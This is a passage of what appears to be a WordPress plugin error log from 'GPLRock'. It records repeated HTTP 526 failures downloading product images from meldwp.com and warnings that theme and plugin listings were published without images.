23:41:53 UTC] GPLRock: Image download failed for product unicka-hair-styling-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unicka---hair-styling--beauty-salon-wordpress-theme-4122.webp for product unicka-hair-styling-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:41:56 UTC] GPLRock: Image download failed for product unicka-hair-styling-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:41:58 UTC] GPLRock: Image download failed for product unicka-hair-styling-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unicka---hair-styling--beauty-salon-wordpress-theme-4122.webp for product unicka-hair-styling-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:42:00 UTC] GPLRock WARNING: Image download failed for product unicka-hair-styling-beauty-salon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/unicka---hair-styling--beauty-salon-wordpress-theme-4122.webp [04-Apr-2026 23:42:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unicka-hair-styling-beauty-salon-wordpress-theme [04-Apr-2026 23:42:00 UTC] GPLRock: Image download failed for product azure-blog-wordpress-themes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:02 UTC] GPLRock: Image download failed for product azure-blog-wordpress-themes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/azure---blog-wordpress-themes-4078.webp for product azure-blog-wordpress-themes after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:42:04 UTC] GPLRock: Image download failed for product azure-blog-wordpress-themes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:06 UTC] GPLRock: Image download failed for product azure-blog-wordpress-themes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/azure---blog-wordpress-themes-4078.webp for product azure-blog-wordpress-themes after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:42:09 UTC] GPLRock WARNING: Image download failed for product azure-blog-wordpress-themes. URL: https://meldwp.com/wp-content/uploads/azure---blog-wordpress-themes-4078.webp [04-Apr-2026 23:42:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: azure-blog-wordpress-themes [04-Apr-2026 23:42:09 UTC] GPLRock: Image download failed for product vg-emodern-furniture-theme-with-9-homepages (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:11 UTC] GPLRock: Image download failed for product vg-emodern-furniture-theme-with-9-homepages (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-emodern---furniture-theme-with-9-homepages-910.webp for product vg-emodern-furniture-theme-with-9-homepages after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:42:13 UTC] GPLRock: Image download failed for product vg-emodern-furniture-theme-with-9-homepages (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:15 UTC] GPLRock: Image download failed for product vg-emodern-furniture-theme-with-9-homepages (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-emodern---furniture-theme-with-9-homepages-910.webp for product vg-emodern-furniture-theme-with-9-homepages after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:42:17 UTC] GPLRock WARNING: Image download failed for product vg-emodern-furniture-theme-with-9-homepages. URL: https://meldwp.com/wp-content/uploads/vg-emodern---furniture-theme-with-9-homepages-910.webp [04-Apr-2026 23:42:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vg-emodern-furniture-theme-with-9-homepages [04-Apr-2026 23:42:17 UTC] GPLRock: Image download failed for product dishify-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:19 UTC] GPLRock: Image download failed for product dishify-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dishify---restaurant-wordpress-theme-33759.webp for product dishify-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:42:22 UTC] GPLRock: Image download failed for product dishify-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:24 UTC] GPLRock: Image download failed for product dishify-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:42:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dishify---restaurant-wordpress-theme-33759.webp for product dishify-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:42:26 UTC] GPLRock WARNING: Image download failed for product dishify-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dishify---restaurant-wordpress-theme-33759.webp [04-Apr-2026 23:42:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dishify-restaurant-wordpress-theme [04-Apr-2026 23:42:59 UTC] GPLRock: Image download failed for product bellatrix-wordpress-portfolio-theme-shutter-one-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:01 UTC] GPLRock: Image download failed for product bellatrix-wordpress-portfolio-theme-shutter-one-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bellatrix--wordpress-portfolio-theme---shutter-one-page-3692.webp for product bellatrix-wordpress-portfolio-theme-shutter-one-page after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:04 UTC] GPLRock: Image download failed for product bellatrix-wordpress-portfolio-theme-shutter-one-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:06 UTC] GPLRock: Image download failed for product bellatrix-wordpress-portfolio-theme-shutter-one-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bellatrix--wordpress-portfolio-theme---shutter-one-page-3692.webp for product bellatrix-wordpress-portfolio-theme-shutter-one-page after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:08 UTC] GPLRock WARNING: Image download failed for product bellatrix-wordpress-portfolio-theme-shutter-one-page. URL: https://meldwp.com/wp-content/uploads/bellatrix--wordpress-portfolio-theme---shutter-one-page-3692.webp [04-Apr-2026 23:43:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bellatrix-wordpress-portfolio-theme-shutter-one-page [04-Apr-2026 23:43:09 UTC] GPLRock: Image download failed for product frudbaz-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:11 UTC] GPLRock: Image download failed for product frudbaz-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/frudbaz---restaurant-wordpress-theme-19851.webp for product frudbaz-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:13 UTC] GPLRock: Image download failed for product frudbaz-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:15 UTC] GPLRock: Image download failed for product frudbaz-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/frudbaz---restaurant-wordpress-theme-19851.webp for product frudbaz-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:17 UTC] GPLRock WARNING: Image download failed for product frudbaz-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/frudbaz---restaurant-wordpress-theme-19851.webp [04-Apr-2026 23:43:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: frudbaz-restaurant-wordpress-theme [04-Apr-2026 23:43:18 UTC] GPLRock: Image download failed for product mim-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:20 UTC] GPLRock: Image download failed for product mim-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mim---personal-portfolio-wordpress-theme-28645.webp for product mim-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:22 UTC] GPLRock: Image download failed for product mim-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:24 UTC] GPLRock: Image download failed for product mim-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mim---personal-portfolio-wordpress-theme-28645.webp for product mim-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:26 UTC] GPLRock WARNING: Image download failed for product mim-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mim---personal-portfolio-wordpress-theme-28645.webp [04-Apr-2026 23:43:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mim-personal-portfolio-wordpress-theme [04-Apr-2026 23:43:27 UTC] GPLRock: Image download failed for product gruene-digital-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:29 UTC] GPLRock: Image download failed for product gruene-digital-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gruene---digital-marketing-wordpress-theme-10523.webp for product gruene-digital-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:31 UTC] GPLRock: Image download failed for product gruene-digital-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:33 UTC] GPLRock: Image download failed for product gruene-digital-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gruene---digital-marketing-wordpress-theme-10523.webp for product gruene-digital-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:35 UTC] GPLRock WARNING: Image download failed for product gruene-digital-marketing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gruene---digital-marketing-wordpress-theme-10523.webp [04-Apr-2026 23:43:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gruene-digital-marketing-wordpress-theme [04-Apr-2026 23:43:35 UTC] GPLRock: Image download failed for product pallu-dental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:37 UTC] GPLRock: Image download failed for product pallu-dental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pallu---dental-wordpress-theme-22073.webp for product pallu-dental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:40 UTC] GPLRock: Image download failed for product pallu-dental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:42 UTC] GPLRock: Image download failed for product pallu-dental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pallu---dental-wordpress-theme-22073.webp for product pallu-dental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:44 UTC] GPLRock WARNING: Image download failed for product pallu-dental-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pallu---dental-wordpress-theme-22073.webp [04-Apr-2026 23:43:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pallu-dental-wordpress-theme [04-Apr-2026 23:43:44 UTC] GPLRock: Image download failed for product lestin-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:46 UTC] GPLRock: Image download failed for product lestin-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lestin---directory-listing-wordpress-theme-19563.webp for product lestin-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:48 UTC] GPLRock: Image download failed for product lestin-directory-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:50 UTC] GPLRock: Image download failed for product lestin-directory-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lestin---directory-listing-wordpress-theme-19563.webp for product lestin-directory-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:52 UTC] GPLRock WARNING: Image download failed for product lestin-directory-listing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lestin---directory-listing-wordpress-theme-19563.webp [04-Apr-2026 23:43:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lestin-directory-listing-wordpress-theme [04-Apr-2026 23:43:53 UTC] GPLRock: Image download failed for product ignavo-auto-parts-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:55 UTC] GPLRock: Image download failed for product ignavo-auto-parts-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ignavo---auto-parts-woocommerce-theme-15631.webp for product ignavo-auto-parts-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:43:57 UTC] GPLRock: Image download failed for product ignavo-auto-parts-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:43:59 UTC] GPLRock: Image download failed for product ignavo-auto-parts-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ignavo---auto-parts-woocommerce-theme-15631.webp for product ignavo-auto-parts-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:44:01 UTC] GPLRock WARNING: Image download failed for product ignavo-auto-parts-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/ignavo---auto-parts-woocommerce-theme-15631.webp [04-Apr-2026 23:44:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ignavo-auto-parts-woocommerce-theme [04-Apr-2026 23:44:02 UTC] GPLRock: Image download failed for product alinan-wp-a-personal-wordpress-blog-and-vlog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:04 UTC] GPLRock: Image download failed for product alinan-wp-a-personal-wordpress-blog-and-vlog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alinan-wp---a-personal-wordpress-blog-and-vlog-theme-15030.webp for product alinan-wp-a-personal-wordpress-blog-and-vlog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:44:07 UTC] GPLRock: Image download failed for product alinan-wp-a-personal-wordpress-blog-and-vlog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:09 UTC] GPLRock: Image download failed for product alinan-wp-a-personal-wordpress-blog-and-vlog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alinan-wp---a-personal-wordpress-blog-and-vlog-theme-15030.webp for product alinan-wp-a-personal-wordpress-blog-and-vlog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:44:11 UTC] GPLRock WARNING: Image download failed for product alinan-wp-a-personal-wordpress-blog-and-vlog-theme. URL: https://meldwp.com/wp-content/uploads/alinan-wp---a-personal-wordpress-blog-and-vlog-theme-15030.webp [04-Apr-2026 23:44:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alinan-wp-a-personal-wordpress-blog-and-vlog-theme [04-Apr-2026 23:44:11 UTC] GPLRock: Image download failed for product bizconmy-business-and-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:13 UTC] GPLRock: Image download failed for product bizconmy-business-and-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bizconmy---business-and-consulting-wordpress-theme-23405.webp for product bizconmy-business-and-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:44:15 UTC] GPLRock: Image download failed for product bizconmy-business-and-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:17 UTC] GPLRock: Image download failed for product bizconmy-business-and-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bizconmy---business-and-consulting-wordpress-theme-23405.webp for product bizconmy-business-and-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:44:20 UTC] GPLRock WARNING: Image download failed for product bizconmy-business-and-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bizconmy---business-and-consulting-wordpress-theme-23405.webp [04-Apr-2026 23:44:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bizconmy-business-and-consulting-wordpress-theme [04-Apr-2026 23:44:20 UTC] GPLRock: Image download failed for product shadower-pro-a-responsive-wordpress-theme-for-bloggers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:22 UTC] GPLRock: Image download failed for product shadower-pro-a-responsive-wordpress-theme-for-bloggers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shadower-pro---a-responsive-wordpress-theme-for-bloggers-31659.webp for product shadower-pro-a-responsive-wordpress-theme-for-bloggers after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:44:24 UTC] GPLRock: Image download failed for product shadower-pro-a-responsive-wordpress-theme-for-bloggers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:26 UTC] GPLRock: Image download failed for product shadower-pro-a-responsive-wordpress-theme-for-bloggers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:44:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shadower-pro---a-responsive-wordpress-theme-for-bloggers-31659.webp for product shadower-pro-a-responsive-wordpress-theme-for-bloggers after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:44:28 UTC] GPLRock WARNING: Image download failed for product shadower-pro-a-responsive-wordpress-theme-for-bloggers. URL: https://meldwp.com/wp-content/uploads/shadower-pro---a-responsive-wordpress-theme-for-bloggers-31659.webp [04-Apr-2026 23:44:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shadower-pro-a-responsive-wordpress-theme-for-bloggers [04-Apr-2026 23:44:59 UTC] GPLRock: Image download failed for product tailor-online-woocommerce-plugin-for-online-custom-tailoring (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:01 UTC] GPLRock: Image download failed for product tailor-online-woocommerce-plugin-for-online-custom-tailoring (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tailor-online---woocommerce-plugin-for-online-custom-tailoring-15302.webp for product tailor-online-woocommerce-plugin-for-online-custom-tailoring after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:03 UTC] GPLRock: Image download failed for product tailor-online-woocommerce-plugin-for-online-custom-tailoring (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:05 UTC] GPLRock: Image download failed for product tailor-online-woocommerce-plugin-for-online-custom-tailoring (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tailor-online---woocommerce-plugin-for-online-custom-tailoring-15302.webp for product tailor-online-woocommerce-plugin-for-online-custom-tailoring after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:08 UTC] GPLRock WARNING: Image download failed for product tailor-online-woocommerce-plugin-for-online-custom-tailoring. URL: https://meldwp.com/wp-content/uploads/tailor-online---woocommerce-plugin-for-online-custom-tailoring-15302.webp [04-Apr-2026 23:45:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tailor-online-woocommerce-plugin-for-online-custom-tailoring [04-Apr-2026 23:45:08 UTC] GPLRock: Image download failed for product woocommerce-guided-selling-product-advisor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:10 UTC] GPLRock: Image download failed for product woocommerce-guided-selling-product-advisor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-guided-selling--product-advisor-33673.webp for product woocommerce-guided-selling-product-advisor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:12 UTC] GPLRock: Image download failed for product woocommerce-guided-selling-product-advisor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:14 UTC] GPLRock: Image download failed for product woocommerce-guided-selling-product-advisor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-guided-selling--product-advisor-33673.webp for product woocommerce-guided-selling-product-advisor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:16 UTC] GPLRock WARNING: Image download failed for product woocommerce-guided-selling-product-advisor. URL: https://meldwp.com/wp-content/uploads/woocommerce-guided-selling--product-advisor-33673.webp [04-Apr-2026 23:45:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-guided-selling-product-advisor [04-Apr-2026 23:45:16 UTC] GPLRock: Image download failed for product shutter-slider-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:19 UTC] GPLRock: Image download failed for product shutter-slider-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shutter-slider-addon-for-wpbakery-page-builder-31739.webp for product shutter-slider-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:21 UTC] GPLRock: Image download failed for product shutter-slider-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:23 UTC] GPLRock: Image download failed for product shutter-slider-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shutter-slider-addon-for-wpbakery-page-builder-31739.webp for product shutter-slider-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:25 UTC] GPLRock WARNING: Image download failed for product shutter-slider-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/shutter-slider-addon-for-wpbakery-page-builder-31739.webp [04-Apr-2026 23:45:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shutter-slider-addon-for-wpbakery-page-builder [04-Apr-2026 23:45:25 UTC] GPLRock: Image download failed for product dt-directory-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:27 UTC] GPLRock: Image download failed for product dt-directory-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dt---directory-wordpress-plugin-19823.webp for product dt-directory-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:29 UTC] GPLRock: Image download failed for product dt-directory-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:32 UTC] GPLRock: Image download failed for product dt-directory-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dt---directory-wordpress-plugin-19823.webp for product dt-directory-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:34 UTC] GPLRock WARNING: Image download failed for product dt-directory-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/dt---directory-wordpress-plugin-19823.webp [04-Apr-2026 23:45:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dt-directory-wordpress-plugin [04-Apr-2026 23:45:34 UTC] GPLRock: Image download failed for product eventon-report (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:36 UTC] GPLRock: Image download failed for product eventon-report (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventon---report-7794.webp for product eventon-report after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:38 UTC] GPLRock: Image download failed for product eventon-report (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:40 UTC] GPLRock: Image download failed for product eventon-report (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventon---report-7794.webp for product eventon-report after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:42 UTC] GPLRock WARNING: Image download failed for product eventon-report. URL: https://meldwp.com/wp-content/uploads/eventon---report-7794.webp [04-Apr-2026 23:45:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eventon-report [04-Apr-2026 23:45:43 UTC] GPLRock: Image download failed for product amazcart-laravel-ecommerce-system-cms-multi-vendor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:45 UTC] GPLRock: Image download failed for product amazcart-laravel-ecommerce-system-cms-multi-vendor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amazcart---laravel-ecommerce-system-cms-multi-vendor-11073.webp for product amazcart-laravel-ecommerce-system-cms-multi-vendor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:47 UTC] GPLRock: Image download failed for product amazcart-laravel-ecommerce-system-cms-multi-vendor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:49 UTC] GPLRock: Image download failed for product amazcart-laravel-ecommerce-system-cms-multi-vendor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amazcart---laravel-ecommerce-system-cms-multi-vendor-11073.webp for product amazcart-laravel-ecommerce-system-cms-multi-vendor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:51 UTC] GPLRock WARNING: Image download failed for product amazcart-laravel-ecommerce-system-cms-multi-vendor. URL: https://meldwp.com/wp-content/uploads/amazcart---laravel-ecommerce-system-cms-multi-vendor-11073.webp [04-Apr-2026 23:45:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amazcart-laravel-ecommerce-system-cms-multi-vendor [04-Apr-2026 23:45:52 UTC] GPLRock: Image download failed for product image-hover-effects-for-avada-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:54 UTC] GPLRock: Image download failed for product image-hover-effects-for-avada-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-hover-effects-for-avada-builder-30769.webp for product image-hover-effects-for-avada-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:45:56 UTC] GPLRock: Image download failed for product image-hover-effects-for-avada-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:45:58 